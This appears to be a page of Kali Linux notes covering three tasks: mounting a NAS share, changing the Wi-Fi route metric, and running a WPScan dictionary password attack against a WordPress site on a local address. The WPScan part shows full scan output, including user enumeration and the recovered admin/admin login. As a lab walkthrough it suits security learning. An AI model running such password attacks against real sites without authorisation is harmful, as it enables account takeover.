$lsb_release -a Distributor ID: Kali Description: Kali GNU/Linux Rolling Release: 2020.1 Codename: kali-rolling
Kali Linux live system does not have any persistent file system as default. If you would like to store the data on the live system, you may need external storage such as NAS(Network Attached Storage). The following mount.cifs command mounts a NAS file system to /mnt directory.
$sudo mount.cifs //192.168.0.10/home /mnt -o username=share-user Password for share-user@//192.168.0.10/home: *******
where //192.168.0.10/home is the NAS IP address and shared directory, /mnt is the mounting point, and “share-user” is the NAS account name.
Since kali account does not have the write permission to /mnt, The write access to mounted directory requires sudo.
$sudo cp foo.txt /mnt/
To unmount the mounted NAS shared directory, use the umount command.
$sudo umount /mnt
WPScan is a WordPress vulnerability scanner. WPScan is found in the Kali desktop menu 03:Web Application Analysis>Web Vulnerability Scanners.
The following command runs password-attack to wordpress server(192.168.0.3/wordpress). –passwords option requires password file that contains a list of passwords to use during the password attack.
One of the easiest ways to prepare the password file is to use Openwall wordlists collection(https://download.openwall.net/). The following command uses the file named “password” as its list of passwords, which downloaded from /pub/wordlists/passwords directory.
kali@kali:~$ wpscan --url 192.168.0.3/wordpress --passwords ./password _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.6 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [+] URL: http://192.168.0.3/wordpress/ [+] Started: Mon Apr 25 00:00:00 20xx Interesting Finding(s): [+] http://192.168.0.3/wordpress/ | Interesting Entry: Server: Apache/2.4.38 (Raspbian) | Found By: Headers (Passive Detection) | Confidence: 100% [+] http://192.168.0.3/wordpress/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://wordpress_ghost_scanner | - https://wordpress_xmlrpc_dos | - https://wordpress_xmlrpc_login | - https://wordpress_pingback_access [+] http://192.168.0.3/wordpress/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] Upload directory has listing enabled: http://192.168.0.3/wordpress/wp-content/uploads/ | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] http://192.168.0.3/wordpress/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.4 identified (Latest, released on 2020-03-31). | Found By: Emoji Settings (Passive Detection) | - http://192.168.0.3/wordpress/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.0.3/wordpress/, Match: 'WordPress 5.4' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups -: |=============================================| [i] No Config Backups Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs -: |============================================| [i] User(s) Identified: [+] admin | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Wp Login against 1 user/s Progress: |================================================= [SUCCESS] - admin / admin Progress: |===============================================================| [i] Valid Combinations Found: | Username: admin, Password: admin [+] Finished: Mon Apr 25 00:00:00 20xx [+] Requests Done: 2895 [+] Cached Requests: 5 [+] Data Sent: 1.42 MB [+] Data Received: 16.047 MB [+] Memory used: 132.027 MB [+] Elapsed time: 00:02:43
The log shows that wpscan found admin/admin account-password pair in 3 minutes.
Note: wpscan requires internet access to update its database. If the network is unreachable to the database server, wpscan aborted.
_______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.7.6 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn't connect to server)
When Wi-Fi and Ethernet are both connected and Wi-Fi is the only way to to access the internet, kali linux default routing cannot access the internet. To access the internet on this system, Wi-Fi metric value should have lower value than Ethernet metric value.
The metric value of the network devices can be modified by nmcli command.
The following commands change Wi-Fi metric value from 600 to 50. After changing the metric value , Wi-Fi has lower metric value and the system can access the internet.
# default network setting kali@kali:$ ip r default via 192.168.0.1 dev eth0 proto dhcp metric 100 default via 192.168.10.1 dev wlan0 proto dhcp metric 600 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.2 metric 100 192.168.10.0/24 dev wlan0 proto kernel scope link src 192.168.10.9 metric 600 # change wlan0 metric from 600 to 50 kali@kali:$ sudo nmcli connection modify access-point-name ipv4.route-metric 50 kali@kali:/mnt/tmp$ sudo nmcli connection up access-point-name Connection successfully activated (D-Bus active path: /org/freedesktop/NetworkManager/ActiveConnection/5) # current network setting kali@kali:$ ip r default via 192.168.10.1 dev wlan0 proto dhcp metric 50 default via 192.168.0.1 dev eth0 proto dhcp metric 100 192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.2 metric 100 192.168.10.0/24 dev wlan0 proto kernel scope link src 192.168.10.9 metric 50